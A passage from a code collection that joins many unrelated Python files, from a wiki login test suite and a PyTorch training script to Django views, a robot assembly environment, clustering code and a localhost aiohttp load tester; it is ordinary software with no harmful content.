REGISTRY["passonly"] = (REGISTRY_DEFAULTS[0], "", REGISTRY_DEFAULTS[2], wikibrowser.BadLoginError)
REGISTRY["baduser"] = (REGISTRY_DEFAULTS[0], "eljefee", REGISTRY_DEFAULTS[2], wikibrowser.BadLoginError)
REGISTRY["badpass"] = (REGISTRY_DEFAULTS[0], REGISTRY_DEFAULTS[1], "wrongpass", wikibrowser.BadLoginError)
WIKIPEDIA["correct"] = WIKIPEDIA_DEFAULTS
WIKIPEDIA["badurl"] = ("http://com", WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.BadURLError)
WIKIPEDIA["wrongurl"] = ("http://ebay.com", WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.SiteLayoutError)
WIKIPEDIA["nologin"] = (WIKIPEDIA_DEFAULTS[0], "", "", wikibrowser.BadLoginError)
WIKIPEDIA["useronly"] = (WIKIPEDIA_DEFAULTS[0], WIKIPEDIA_DEFAULTS[1], "", wikibrowser.BadLoginError)
WIKIPEDIA["passonly"] = (WIKIPEDIA_DEFAULTS[0], "", WIKIPEDIA_DEFAULTS[2], wikibrowser.BadLoginError)
WIKIPEDIA["baduser"] = (WIKIPEDIA_DEFAULTS[0], "jhasdghasdjhkasf", WIKIPEDIA_DEFAULTS[2], wikibrowser.BadLoginError)
WIKIPEDIA["badpass"] = (WIKIPEDIA_DEFAULTS[0], WIKIPEDIA_DEFAULTS[1], "notright345u6", wikibrowser.BadLoginError)
WIKIPEDIA["locked"] = ("http://en.wikipedia.org/wiki/Main_Page",
WIKIPEDIA_DEFAULTS[1], WIKIPEDIA_DEFAULTS[2], wikibrowser.PageLockedError)
def suite():
suite = unittest.TestSuite()
for wiki in TEST_WIKIS:
if "" in TEST_WIKIS[wiki]["correct"][1:3]: # username or password not entered
continue
else:
if raw_input("test %s? " % wiki) == "yes":
wiki = TEST_WIKIS[wiki]
for login in wiki:
#if login == "correct":
# continue
print " adding test case %s" % login
login = wiki[login]
suite.addTest( MapUploadTest(url=login[0], username=login[1], password=login[2], error=login[3]) )
return suite
def runTests():
suite().debug()
if __name__ == "__main__":
runTests()
| StarcoderdataPython |
1726023 | <gh_stars>1-10
import argparse
import os
import time
import torch
import torch.optim as optim
import numpy as np
import utils
import Models.CNNs
import Models.NNs
from evaluate import evaluate
from Models.data_loaders import fetch_dataloader
# Set up command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data_directory', default='01_Data/02_Imagery',
required=True, help='Directory containing the dataset')
parser.add_argument('-o', '--model_output', default='03_Trained_Models',
required=True, help='Directory to output model results')
parser.add_argument('-m', '--model_parameters',
required=True, help='Path to model parameters')
# Define training function
def train(model, optimizer, loss_fn, dataloader, metrics, params, logger):
"""
Trains model on training data using the parameters specified in the
params file path for a single epoch
:param model: (torch.nn.Module)
:param optimizer: (torch.optim)
:param loss_fn: a function to compute the loss based on outputs and labels
:param dataloader:
:param metrics: (dict) a dictionary including relevant metrics
:param params: a dictionary of parameters
:param logger: (utils.Logger) file to output training information
:return: (float) average training loss for the epoch
"""
# Set model to train mode
model.train(mode=True)
# Set summary lists
metrics_summary = []
losses = []
for i, (train_batch, labels_batch) in enumerate(dataloader):
# Cast batch to float
train_batch = train_batch.float()
# Check for GPU and send variables
if use_cuda:
model.cuda()
train_batch, labels_batch = train_batch.cuda(), labels_batch.cuda()
# Prepare data
if not 'AQI' in params['output_variable']:
labels_batch = labels_batch.float()
# Forward propagation, loss computation and backpropagation
output_batch = model(train_batch)
loss = loss_fn(output_batch, labels_batch)
optimizer.zero_grad()
loss.backward()
# Update parameters
optimizer.step()
# Log progress and compute statistics
if i % params['save_summary_steps'] == 0:
# Convert output_batch and labels_batch to np
if use_cuda:
output_batch, labels_batch = output_batch.cpu(), labels_batch.cpu()
output_batch, labels_batch = output_batch.detach().numpy(), \
labels_batch.detach().numpy()
# Compute metrics
summary_batch = {metric: metrics[metric](output_batch, labels_batch)
for metric in metrics}
summary_batch['loss'] = loss.item()
metrics_summary.append(summary_batch)
# Append loss
losses.append(loss.item())
# Compute metrics mean and add to logger
metrics_mean = {metric: np.mean([x[metric] for x in metrics_summary]) for metric in metrics}
logger.write('[MODEL INFO] Training metrics mean:')
logger.write_dict(metrics_mean)
# Compute average loss
avg_loss = np.mean(losses)
logger.write("[MODEL INFO] Running average training loss: {:2f}".format(avg_loss))
return avg_loss
def train_and_evaluate(model, optimizer, loss_fn, train_dataloader,
val_dataloader, metrics, params, model_dir, logger,
restore_file=None):
"""
Train the model and evaluate on a validation dataset using the parameters
specified in the params file path.
:param model: (torch.nn.Module) the model to be trained
:param optimizer: (torch.optim)
:param loss_fn: (nn.MSEloss or nn.CrossEntropyLoss)
:param train_dataloader: (torch.utils.data.Dataloader)
:param val_dataloader: (torch.utils.data.Dataloader)
:param metrics: (dict) metrics to be computed
:param params: (dict) model parameters
:param model_dir: (str) directory to output model performance
:param restore_file: (str) path to model reload model weights
:return: void
"""
train_losses = []
eval_losses = []
# Reload weights if specified
if restore_file != "":
try:
utils.load_checkpoint(restore_file, model, optimizer)
except FileNotFoundError:
print('[ERROR] Model weights file not found.')
logger.write('[INFO] Restoring weights from file ' + restore_file)
# Initiate best validation accuracy
if params['validation_metric'] == 'RMSE':
best_val_metric = np.Inf
else:
best_val_metric = 0.0
for epoch in range(params['num_epochs']):
# Train single epoch on the training set
logger.write('[INFO] Training Epoch {}/{}'.format(epoch + 1, params['num_epochs']))
train_loss = train(
model, optimizer, loss_fn, train_dataloader, metrics, params, logger)
train_losses.append(train_loss)
# Evaluate single epoch on the validation set
val_metrics, eval_loss = evaluate(
model, loss_fn, val_dataloader, metrics, params, logger)
eval_losses.append(eval_loss)
val_metric = val_metrics[params['validation_metric']]
# Determine if model is superior
if params['validation_metric'] == 'RMSE':
is_best = val_metric <= best_val_metric
else:
is_best = val_metric >= best_val_metric
# Save weights
utils.save_checkpoint(
state={'epoch': epoch + 1,
'state_dict': model.state_dict(),
'optim_dict': optimizer.state_dict()},
is_best=is_best, checkpoint=model_output)
# Save superior models
if is_best:
logger.write('[INFO] New best {}: {}'.format(
params['validation_metric'], val_metric))
best_val_metric = val_metric
# Save best val metrics
best_json_path = os.path.join(
model_dir, 'metrics_val_best_weights.json')
utils.save_dict(
{params['validation_metric']: str(val_metric)},
best_json_path)
# Save metrics
last_json_path = os.path.join(
model_dir, 'metrics_val_last_weights.json')
utils.save_dict(
{params['validation_metric']: str(val_metric)}, last_json_path)
# Save learning plot
utils.plot_learning(train_losses, eval_losses, model_dir)
if __name__ == '__main__':
# Capture parameters from the command line
args = vars(parser.parse_args())
data_directory = args['data_directory']
model_output = args['model_output']
params_file = args['model_parameters']
# Verify parameter file
try:
params = utils.load_dict(params_file)
except FileNotFoundError:
print("[ERROR] Parameter file not found.")
# Use GPU if available
use_cuda = torch.cuda.is_available()
# Set random seed
torch.manual_seed(42)
if use_cuda:
torch.cuda.manual_seed(42)
# Set up logger
logger = utils.Logger(os.path.join(model_output, 'logger.txt'))
# Fetch dataloaders
logger.write('[INFO] Loading the datasets...')
dataloaders = fetch_dataloader(
dataset_types=['train', 'dev'], data_dir=data_directory,
output_variable=params['output_variable'], params=params)
train_dl = dataloaders['train']
val_dl = dataloaders['dev']
logger.write('[INFO] Datasets loaded successfully...')
# Get number of channels / feature size for concat model
no_channels = next(iter(val_dl))[0].shape[1]
# Define model, and fetch loss function and metrics
if 'AQI' not in params['output_variable']:
if params['model_type'] == 'concat':
model = Models.NNs.ConcatNet(feat_size=no_channels, p=params['p_dropout'], out_size=1)
elif params['model_type'] == 'sat' or params['model_type'] == 'street':
model = Models.CNNs.ResNetRegression(
no_channels=no_channels, p=params['p_dropout'],
add_block=params['extra_DO_layer'], num_frozen=params['num_frozen'])
else:
raise Exception('[ERROR] Model type should be in {sat, street, concat}')
loss_fn = Models.CNNs.loss_fn_regression
metrics = Models.CNNs.metrics_regression
else:
if params['model_type'] == 'concat':
model = Models.NNs.ConcatNet(
feat_size=no_channels, p=params['p_dropout'], out_size=params['num_classes'])
elif params['model_type'] == 'sat' or params['model_type'] == 'street':
model = Models.CNNs.ResNetClassifier(
no_channels=no_channels, num_classes=params['num_classes'],
p=params['p_dropout'], add_block=params['extra_DO_layer'],
num_frozen=params['num_frozen'])
else:
raise Exception('[ERROR] Model type should be in {sat, street, concat}')
loss_fn = Models.CNNs.loss_fn_classification
metrics = Models.CNNs.metrics_classification
if use_cuda:
model = model.cuda()
# Define optimizer
optimizer = getattr(optim, params['optimizer'])(
params=model.parameters(), lr=params['learning_rate'])
# Train
logger.write('[INFO] Starting training {} for {} epoch(s)'.format(
params['model_type'], params['num_epochs']))
t0 = time.time()
train_and_evaluate(model, optimizer, loss_fn, train_dl,
val_dl, metrics, params, model_output, logger,
restore_file=params['restore_file'])
logger.write('[INFO] Training completed in {:2f} minute(s)'.format(
(time.time() - t0) / 60))
| StarcoderdataPython |
1641834 | """
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
from lte.protos.mconfig import mconfigs_pb2
from magma.common.service import MagmaService
from magma.configuration import load_service_config
from magma.monitord.icmp_monitoring import ICMPMonitoring
from magma.monitord.icmp_state import serialize_subscriber_states
def main():
""" main() for monitord service"""
service = MagmaService('monitord', mconfigs_pb2.MonitorD())
# Monitoring thread loop
mtr_interface = load_service_config("monitord")["mtr_interface"]
icmp_monitor = ICMPMonitoring(service.mconfig.polling_interval,
service.loop, mtr_interface)
icmp_monitor.start()
# Register a callback function for GetOperationalStates
service.register_operational_states_callback(
lambda: serialize_subscriber_states(
icmp_monitor.get_subscriber_state()))
# Run the service loop
service.run()
# Cleanup the service
service.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
1752692 | from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('cmsplugin_cascade', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Segmentation',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
options={
'verbose_name': 'Segmentation',
'managed': False,
'verbose_name_plural': 'Segmentation',
},
bases=(models.Model,),
),
migrations.AlterField(
model_name='cascadeelement',
name='glossary',
field=models.JSONField(default={}, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='pluginextrafields',
name='plugin_type',
field=models.CharField(max_length=50, verbose_name='Plugin Name', db_index=True),
preserve_default=True,
),
migrations.AlterField(
model_name='sharablecascadeelement',
name='glossary',
field=models.JSONField(default={}, blank=True),
preserve_default=True,
),
]
| StarcoderdataPython |
1781389 | """
"""
load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive")
def setup_capnproto(name):
version = "0.9.1"
http_archive(
name = name,
build_file = "@caffeine//third_party/capnp:capnproto.BUILD",
sha256 = "daf49f794560f715e2f4651c842aaece2d065d4216834c5c3d3254962e35b535",
strip_prefix = "capnproto-{}".format(version),
url = "https://github.com/capnproto/capnproto/archive/refs/tags/v{}.tar.gz".format(version),
)
| StarcoderdataPython |
183002 | <reponame>Techme2911/HacktoberFest19-Algo
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 27 09:09:36 2019
@author: Dell
"""
import math as m
m.pow(2,6)#returns 2^6
m.factorial(6)#returns 6!
m.floor(23.4)#returns an integer lower than the real number
#in this case 23
m.floor(23)#here also 23
m.fmod(6,4)#returns remainder when first arg divided by second arg.
m.modf(23.4)#returs integral and fractional part of the arg.
#here it returns (0.3999999999999986,23.0)
#here it returns an imprecise value of fractional part to 16 decimal digits.
area_of_a_circle=m.pi*(m.pow(5,2))#gives u area of a circle of radius 5
circumference_of_circle=m.tau*(5)#gives circumference of a circle of radius 5
import random as r
r.random()#returns a random floating number btw 0.0 and 1.0
r.choice([1,2,3,4,5,6])#returns random value from a sequence
"""
The sequence can be a list tupple dictionary etc.
"""
r.randint(1,9)#include last item
r.randrange(1,20,2)#don't include last item
l=[1,3,5,7,9]
r.shuffle(l)
print(l)
import tensorflow as tf
tf.__version__
| StarcoderdataPython |
3238918 | import unittest
from src.main.serialization.codec.codec import Codec
from src.main.serialization.codec.primitive.intCodec import IntCodec
from src.main.serialization.codec.utils.byteIo import ByteIo
from src.main.serialization.codec.utils.bytes import to_byte
from src.test.serialization.codec.test_codec import TestCodec
class TestIntCodec(TestCodec):
def test_wide_range(self):
self.int_seria(None)
self.int_seria(10)
self.int_seria(-10)
self.int_seria(-2147483648)
self.int_seria(2147483647)
def int_seria(self, value: None or int):
codec: Codec[int] = IntCodec(to_byte(12))
writer: ByteIo = self.writer()
codec.write(writer, value)
writer.close()
reader: ByteIo = self.reader()
pim: int = codec.read(reader)
self.assertEqual(value, pim)
reader.close()
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1676680 | <filename>gallery/templatetags/random_numbers.py
import random
from django import template
register = template.Library()
@register.simple_tag
def random_int(a, b=None):
if b is None:
a, b = 0, a
return random.randint(a, b)
| StarcoderdataPython |
1691981 | from rest_framework.authentication import SessionAuthentication, BasicAuthentication
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework.views import APIView
from apprest.serializers.container import CalipsoContainerSerializer
from apprest.services.container import CalipsoContainersServices
class ContainerInfo(APIView):
"""
get:
Return the given container
"""
authentication_classes = (SessionAuthentication, BasicAuthentication)
permission_classes = (IsAuthenticated,)
serializer_class = CalipsoContainerSerializer
pagination_class = None
def get(self, *args, **kwargs):
service = CalipsoContainersServices()
container_id = self.kwargs.get('id')
container = service.get_container_by_id(cid=container_id)
serializer_class = CalipsoContainerSerializer(container)
return Response(serializer_class.data)
class ActiveContainers(APIView):
"""
get:
Return the given container
"""
authentication_classes = (SessionAuthentication, BasicAuthentication)
permission_classes = (IsAuthenticated,)
serializer_class = CalipsoContainerSerializer
pagination_class = None
def get(self, *args, **kwargs):
service = CalipsoContainersServices()
containers = service.list_all_active_containers()
serializer_class = CalipsoContainerSerializer(containers, many=True)
return Response(serializer_class.data)
class UserContainers(APIView):
"""
get:
Return the given container
"""
authentication_classes = (SessionAuthentication, BasicAuthentication)
permission_classes = (IsAuthenticated,)
serializer_class = CalipsoContainerSerializer
pagination_class = None
def get(self, *args, **kwargs):
service = CalipsoContainersServices()
username = self.kwargs.get('username')
containers = service.list_container(username)
serializer_class = CalipsoContainerSerializer(containers, many=True)
return Response(serializer_class.data)
| StarcoderdataPython |
1776545 | <filename>scripts/old_gui.py
import sys
from pyqtgraph import QtCore, QtGui
from cognigraph.pipeline import Pipeline
from cognigraph.nodes import sources, processors, outputs
from cognigraph import TIME_AXIS
from cognigraph.gui.window import GUIWindow
app = QtGui.QApplication(sys.argv)
pipeline = Pipeline()
# file_path = r"/home/dmalt/Code/python/real_eyes/Koleno.eeg"
file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.eeg"
# vhdr_file_path = r"/home/dmalt/Code/python/real_eyes/Koleno.vhdr"
# vhdr_file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.vhdr"
# vhdr_file_path = r"/home/dmalt/Data/cognigraph/data/Koleno.fif"
fwd_path = r'/home/dmalt/mne_data/MNE-sample-data/MEG/sample/dmalt_custom-fwd.fif'
source = sources.FileSource(file_path=file_path)
pipeline.source = source
# pipeline.source = sources.LSLStreamSource(stream_name='cognigraph-mock-stream')
# Processors
preprocessing = processors.Preprocessing(collect_for_x_seconds=120)
pipeline.add_processor(preprocessing)
linear_filter = processors.LinearFilter(lower_cutoff=8.0, upper_cutoff=12.0)
pipeline.add_processor(linear_filter)
inverse_model = processors.InverseModel(method='MNE', forward_model_path=fwd_path, snr=1.0)
pipeline.add_processor(inverse_model)
# beamformer = processors.Beamformer(forward_model_path=fwd_path, output_type='activation')
# pipeline.add_processor(beamformer)
envelope_extractor = processors.EnvelopeExtractor()
pipeline.add_processor(envelope_extractor)
# Outputs
global_mode = outputs.ThreeDeeBrain.LIMITS_MODES.GLOBAL
three_dee_brain = outputs.ThreeDeeBrain(limits_mode=global_mode, buffer_length=6)
pipeline.add_output(three_dee_brain)
pipeline.add_output(outputs.LSLStreamOutput())
# pipeline.initialize_all_nodes()
signal_viewer = outputs.SignalViewer()
pipeline.add_output(signal_viewer, input_node=linear_filter)
window = GUIWindow(pipeline=pipeline)
window.init_ui()
window.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
window.show()
base_controls = window._controls._base_controls
source_controls = base_controls.source_controls
processors_controls = base_controls.processors_controls
outputs_controls = base_controls.outputs_controls
source_controls.source_type_combo.setValue(source_controls.SOURCE_TYPE_PLACEHOLDER)
linear_filter_controls = processors_controls.children()[0]
envelope_controls = processors_controls.children()[2]
# envelope_controls.disabled.setValue(True)
three_dee_brain_controls = outputs_controls.children()[0]
three_dee_brain_controls.limits_mode_combo.setValue('Global')
three_dee_brain_controls.limits_mode_combo.setValue('Local')
window.initialize()
def run():
pipeline.update_all_nodes()
# print(pipeline.source._samples_already_read / 500)
timer = QtCore.QTimer()
timer.timeout.connect(run)
frequency = pipeline.frequency
timer.setInterval(1000. / frequency * 10)
source.loop_the_file = False
source.MAX_SAMPLES_IN_CHUNK = 5
# envelope.disabled = True
if __name__ == '__main__':
import sys
timer.start()
timer.stop()
# TODO: this runs when in iPython. It should not.
# Start Qt event loop unless running in interactive mode or using pyside.
# if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
# sys.exit(QtGui.QApplication.instance().exec_())
| StarcoderdataPython |
4832506 | <reponame>METU-KALFA/furniture<gh_stars>0
from env.furniture import FurnitureEnv
import env.transform_utils as T
from collections import OrderedDict
import gym
import numpy as np
import mujoco_py
import os
np.set_printoptions(suppress=True)
class AssemblyEnv(FurnitureEnv):
name = 'assembly'
def __init__(self, config):
super().__init__(config)
self.threshold = 10 # distance threshold between parts for connecting them
self._camera_pos = config.camera_pos
self._camera_rot = config.camera_tar_pos
self._use_table_arena = config.table_arena
@property
def observation_space(self):
"""
Returns dict where keys are ob names and values are dimensions.
"""
ob_space = OrderedDict()
if self._visual_ob:
ob_space["camera_ob"] = gym.spaces.Box(
low=0,
high=255,
shape=(self._screen_height, self._screen_width, 3),
dtype=np.uint8,
)
if self._object_ob:
# can be changed to the desired number depending on the task
ob_space["object_ob"] = gym.spaces.Box(
low=-np.inf,
high=np.inf,
shape=((3 + 4) * 2,),
)
if self._subtask_ob:
ob_space["subtask_ob"] = gym.spaces.Box(
low=0.0,
high=np.inf,
shape=(2,),
)
return gym.spaces.Dict(ob_space)
@property
def action_size(self):
"""
Returns size of the action space.
"""
return gym.spaces.flatdim(self.action_space)
@property
def action_space(self):
# Instead of ActionSpec class
# use gym.spaces.Dict
# simpler, less code to track,
# better for stable baselines
# Dict is not supported by stable_baselines yet.
# Use simpler action_space
return gym.spaces.Box(
shape=(self.dof,),
low=-1,
high=1,
dtype=np.float32,
)
def step(self, action):
"""
Computes the next environment state given @action.
Stores env state for demonstration if needed.
Returns observation dict, reward float, done bool, and info dict.
"""
self._before_step()
if isinstance(action, list):
action = {key: val for ac_i in action for key, val in ac_i.items()}
if isinstance(action, dict):
action = np.concatenate([action[key] for key in self.action_space.spaces.keys()])
ob, reward, done, info = self._step(action)
done, info, penalty = self._after_step(reward, done, info)
if self._record_demo:
self._store_qpos()
self._demo.add(action=action)
return ob, reward + penalty, done, info
def _step(self, a):
"""
Internal step function. Moves agent, updates unity, and then
returns ob, reward, done, info tuple
"""
if a is None:
a = np.zeros(self.dof)
if self._agent_type == 'Cursor':
self._step_discrete(a)
self._do_simulation(None)
elif self._agent_type != 'Cursor' and self._control_type == 'ik':
self._step_continuous(a)
elif self._control_type == 'torque':
raise NotImplementedError
self._do_simulation(a)
elif self._control_type == 'impedance':
a = self._setup_action(a)
self._do_simulation(a)
else:
raise ValueError
ob = self._get_obs()
done = False
# use icp here
# if self._num_connected == len(self._object_names) - 1:
# self._success = True
# done = True
reward = 0
info = {}
return ob, reward, done, info
def _modify_eq_data(self, part1, part2):
left = False
for i, (id1, id2) in enumerate(zip(self.sim.model.eq_obj1id, self.sim.model.eq_obj2id)):
id1_name = self.sim.model.body_id2name(id1)
id2_name = self.sim.model.body_id2name(id2)
if id1_name == part1 and id2_name == part2:
left = True
break
rel_pose = self.relative_pose_from_names(part1, part2) if left else self.relative_pose_from_names(part2, part1)
index = -1
for i, (id1, id2) in enumerate(zip(self.sim.model.eq_obj1id, self.sim.model.eq_obj2id)):
object_name1 = self._object_body_id2name[id1]
object_name2 = self._object_body_id2name[id2]
if (object_name1 == part1 and object_name2 == part2) or (object_name1 == part2 and object_name2 == part1):
self.sim.model.eq_data[i][0] = rel_pose[0][0]
self.sim.model.eq_data[i][1] = rel_pose[0][1]
self.sim.model.eq_data[i][2] = rel_pose[0][2]
self.sim.model.eq_data[i][3] = rel_pose[1][3]
self.sim.model.eq_data[i][4] = rel_pose[1][0]
self.sim.model.eq_data[i][5] = rel_pose[1][1]
self.sim.model.eq_data[i][6] = rel_pose[1][2]
break
def _connect_random(self, body1, body2, threshold):
# add collision check between parts
self._modify_eq_data(body1, body2)
old_qposes = {}
for name in self._object_names:
old_qposes[name] = self._get_qpos(name)
pos1 = old_qposes[body1][:3]
pos2 = old_qposes[body2][:3]
distance = np.linalg.norm(pos1-pos2)
if distance > threshold:
return False
# remove collision
group1 = self._find_group(body1)
group2 = self._find_group(body2)
for geom_id, body_id in enumerate(self.sim.model.geom_bodyid):
body_name = self.sim.model.body_names[body_id]
if body_name in self._object_names:
group = self._find_group(body_name)
if group in [group1, group2]:
if self.sim.model.geom_contype[geom_id] != 0:
self.sim.model.geom_contype[geom_id] = (1 << 30) - 1 - (1 << (group1 + 1))
self.sim.model.geom_conaffinity[geom_id] = (1 << (group1 + 1))
# move furniture to collision-safe position
if self._agent_type == 'Cursor':
self._stop_objects()
self.sim.forward()
self.sim.step()
min_pos1, max_pos1 = self._get_bounding_box(body1)
min_pos2, max_pos2 = self._get_bounding_box(body2)
min_pos = np.minimum(min_pos1, min_pos2)
if min_pos[2] < 0:
offset = [0, 0, -min_pos[2]]
self._move_rotate_object(body1, offset, [0, 0, 0])
self._move_rotate_object(body2, offset, [0, 0, 0])
# activate weld
if self._agent_type == 'Cursor':
self._stop_objects()
self.sim.forward()
self.sim.step()
self._activate_weld(body1, body2)
for name in self._object_names:
old_qposes[name] = self._set_qpos0(name, old_qposes[name])
self.sim.forward()
self.sim.step()
self._num_connected += 1
# release cursor
if self._agent_type == 'Cursor':
self._cursor_selected[1] = None
# set next subtask
self._get_next_subtask()
def _step_discrete(self, a):
"""
Takes a step for the cursor agent
"""
assert len(a) == 15
actions = [a[:7], a[7:]]
for cursor_i in range(2):
# move
move_offset = actions[cursor_i][0:3] * self._move_speed
# rotate
rotate_offset = actions[cursor_i][3:6] * self._rotate_speed
# select
select = actions[cursor_i][6] > 0
if not select:
self._cursor_selected[cursor_i] = None
success = self._move_cursor(cursor_i, move_offset)
if not success:
if self._debug:
print('could not move cursor')
continue
if self._cursor_selected[cursor_i] is not None:
success = self._move_rotate_object(
self._cursor_selected[cursor_i], move_offset, rotate_offset)
if not success:
if self._debug:
print('could not move cursor due to object out of boundary')
# reset cursor to original position
self._move_cursor(cursor_i, -move_offset)
continue
if select:
if self._cursor_selected[cursor_i] is None:
self._cursor_selected[cursor_i] = self._select_object(cursor_i)
connect = a[14]
if connect > 0 and self._cursor_selected[0] and self._cursor_selected[1]:
if self._debug:
print('random connect ({} and {})'.format(self._cursor_selected[0],
self._cursor_selected[1]))
self._connect_random(self._cursor_selected[0], self._cursor_selected[1], self.threshold)
elif self._connect_step > 0:
self._connect_step = 0
def _step_continuous(self, action):
"""
Step function for continuous control, like Sawyer, Baxter and Ur5
"""
agent_type = self._agent_type
if agent_type == "Ur5":
self._agent_type = 'Sawyer'
super()._step_continuous(action)
self._agent_type = agent_type
def _initialize_robot_pos(self):
agent_type = self._agent_type
if agent_type == "Ur5":
self._agent_type = 'Sawyer'
super()._initialize_robot_pos()
self._agent_type = agent_type
def _reset_internal(self):
"""
Resets simulation internal configurations.
"""
# instantiate simulation from MJCF model
self._load_model_robot()
self._load_model_arena()
self._load_model_object()
self._load_model()
# write xml for unity viewer
if self._unity:
self._unity.change_model(self.mujoco_model.get_xml(),
self._camera_id,
self._screen_width,
self._screen_height)
if self._debug:
print(self.mujoco_model.get_xml())
# construct mujoco model from xml
self.mjpy_model = self.mujoco_model.get_model(mode="mujoco_py")
self.sim = mujoco_py.MjSim(self.mjpy_model)
self.initialize_time()
self._is_render = self._visual_ob or self._render_mode != 'no'
if self._is_render:
self._destroy_viewer()
self._set_camera_position(self._camera_id, self._camera_pos)
self._set_camera_rotation(self._camera_id, self._camera_rot)
# additional housekeeping
self._sim_state_initial = self.sim.get_state()
self._get_reference()
self.cur_time = 0
# necessary to refresh MjData
self.sim.forward()
# setup mocap for ik control
if self._control_type == 'ik':
if self._agent_type == 'Sawyer':
import env.models
from env.controllers import SawyerIKController
self._controller = SawyerIKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
elif self._agent_type == 'Baxter':
import env.models
from env.controllers import BaxterIKController
self._controller = BaxterIKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
elif self._agent_type == 'Ur5':
import env.models
from env.controllers import Ur5IKController
self._controller = Ur5IKController(
bullet_data_path=os.path.join(env.models.assets_root, "bullet_data"),
robot_jpos_getter=self._robot_jpos_getter,
)
def _load_model_robot(self):
"""
Loads sawyer, baxter, or cursor
"""
if self._agent_type == 'Ur5':
from env.models.robots import Ur5
from env.models.grippers import gripper_factory
self.mujoco_robot = Ur5()
self.gripper = gripper_factory("TwoFingerGripper")
self.gripper.hide_visualization()
self.mujoco_robot.add_gripper("right_hand", self.gripper)
base_xpos = [0, 0.5, 0.1] if self._use_table_arena else [0, 0.45, -0.6]
self.mujoco_robot.set_base_xpos(base_xpos)
self.mujoco_robot.set_base_xquat([1, 0, 0, -1])
super()._load_model_robot()
def pose_in_world_from_name(self, name):
"""
A helper function that takes in a named data field and returns the pose
of that object in the world frame.
"""
pos_in_world = self.sim.data.get_body_xpos(name)
rot_in_world = self.sim.data.get_body_xmat(name).reshape((3, 3))
pose_in_world = T.make_pose(pos_in_world, rot_in_world)
return pose_in_world
def relative_pose_from_names(self, body1, body2):
body1_pose_in_world = self.pose_in_world_from_name(body1)
body2_pose_in_world = self.pose_in_world_from_name(body2)
world_pose_in_body1 = T.pose_inv(body1_pose_in_world)
body2_pose_in_body1 = T.pose_in_A_to_pose_in_B(body2_pose_in_world, world_pose_in_body1)
return T.mat2pose(body2_pose_in_body1) | StarcoderdataPython |
164812 | import numpy as np
import matplotlib
import pylab as pl
import pandas
from ae_measure2 import *
from feature_extraction import *
import glob
import os
import pandas as pd
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
from sklearn.metrics import davies_bouldin_score
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import adjusted_rand_score as ari
from sklearn.cluster import SpectralClustering
if __name__ == "__main__":
'''
Set hyperparameters
'''
sig_len = 1024
k = 2 # NOTE: number of clusters
kmeans = KMeans(n_clusters=k, n_init=20000)
#kmeans = SpectralClustering(n_clusters=k, n_init=1000, eigen_solver='arpack'
# ,affinity="nearest_neighbors", n_neighbors=5)
reference_index = 1
test_index = 3
my_scaler = StandardScaler() # NOTE: normalize to unit variance
'''
Read-in and Setup
'''
mypath = 'C:/Research/Framework_Benchmarking/Data/PLB_data.json'
data = load_PLB(mypath)
waves = data['data']
targets = data['target']
angles = data['target_angle']
energy = data['energy']
reference_energies = energy[np.where(targets==reference_index)]
test_energies = energy[np.where(targets==test_index)]
energy_set = np.hstack((reference_energies, test_energies))
reference_waves = waves[np.where(targets==reference_index)]
test_waves = waves[np.where(targets==test_index)]
wave_set = np.vstack((reference_waves, test_waves))
reference_targets = targets[np.where(targets==reference_index)]
test_targets = targets[np.where(targets==test_index)]
target_set = np.hstack((reference_targets, test_targets))
'''
Cast experiment as vectors
'''
vect = []
for wave in wave_set:
feature_vector = extract_Sause_vect(waveform=wave)
vect.append(feature_vector) # set of all waveforms from channel as a vector
# NOTE: do rescaling
vect = my_scaler.fit_transform(vect)
'''
vect = np.array(vect)
x = vect.T[0]
y = vect.T[1]
pl.scatter(x,y,c=target_set)
pl.show()
'''
'''
Do k-means clustering and get labels
'''
print('Beginning clustering')
labels = kmeans.fit(vect).labels_
#print(kmeans.n_iter_)
print('ARI: ', ari(labels,target_set))
#df = pd.DataFrame({'Stress': stress, 'Ch_A': A_lads, 'Ch_B': B_lads, 'Ch_C': C_lads, 'Ch_D': D_lads})
#df.to_csv(r'Frequency_framework_labels.csv')
| StarcoderdataPython |
169727 | import asyncio
import aiohttp
import datetime
import argparse
import random
import uvloop
async def make_request(session, id, port):
try:
async with session.get('http://localhost:%s' % port) as resp:
if resp.status != 200:
print("Server error --%s-- returned for request %d" % (await resp.text(), id))
except BaseException as e:
print("Received error %s for message with id %d" % (e, id))
async def main(tasks, ports, pool_size=1000):
#
# Read ports - we use the full list in a round-robin fashion
#
ports = ports.split(",")
#
# Prepare list of coroutines in advance
#
conn = aiohttp.TCPConnector(limit=pool_size)
async with aiohttp.ClientSession(connector=conn) as session:
coros = [make_request(session, i, random.choice(ports)) for i in range(tasks)]
started_at=datetime.datetime.now()
print("Start time: ", "{:%H:%M:%S:%f}".format(started_at))
await asyncio.gather(*coros)
ended_at=datetime.datetime.now()
print("End time: ", "{:%H:%M:%S:%f}".format(ended_at))
duration = ended_at - started_at
return duration
#
# Parse arguments
#
parser = argparse.ArgumentParser()
parser.add_argument("--tasks",
